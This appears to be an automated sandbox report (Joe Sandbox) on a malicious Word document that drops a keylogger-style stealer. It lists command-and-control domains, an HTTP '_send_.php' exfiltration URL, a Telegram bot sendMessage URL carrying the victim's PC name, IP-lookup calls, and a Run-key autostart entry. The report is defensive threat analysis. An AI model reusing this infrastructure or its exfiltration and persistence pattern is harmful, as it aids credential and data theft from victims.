http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectig	jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://amazonenviro.com/	brightness.exe, 00000008.00000002.2212129795.000000000080E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://amazonenviro.com:80/245_Aiymwhpjxsg	brightness.exe, 00000008.00000002.2212129795.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A4BD000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A503000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A50E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A482000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A43C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A503000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A50E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A413000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A482000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.1894	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.pmail.com0	brightness.exe, 00000008.00000003.2199216003.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2207465458.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2206791912.0000000021427000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2231404841.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232007845.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.8.dr	false		high
https://reallyfreegeoip.org/xml/	jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.000000002621F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A413000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
208.91.198.176	mail.techniqueqatar.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
166.62.27.188	amazonenviro.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
147.124.216.113	unknown	United States	1432	AC-AS-1US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585295
Start date and time:	2025-01-07 13:23:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ENQ-0092025.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@24/10@5/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 148 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 23.56.254.164, 52.182.143.209, 52.111.243.43, 52.111.243.40, 52.111.243.42, 52.111.243.41, 2.21.65.130, 2.21.65.149, 52.109.28.47, 20.190.159.73, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, e26769.dscb.akamaiedge.net, uks-azsc-000.roaming.officeapps.live.com, prod-eu-resolver.natur
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:25:00	API Interceptor	2x Sleep call for process: brightness.exe modified
07:25:15	API Interceptor	4x Sleep call for process: Aiymwhpj.PIF modified
07:25:18	API Interceptor	1497630x Sleep call for process: jphwmyiA.pif modified
13:25:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url
13:25:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
208.91.198.176	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	grace.exe	Get hash	malicious	AgentTesla	Browse
	RTGS-WB-ABS-240730-NEW.lnk	Get hash	malicious	AgentTesla	Browse
149.154.167.220	Resource.exe	Get hash	malicious	Blank Grabber	Browse
	user.exe	Get hash	malicious	Unknown	Browse
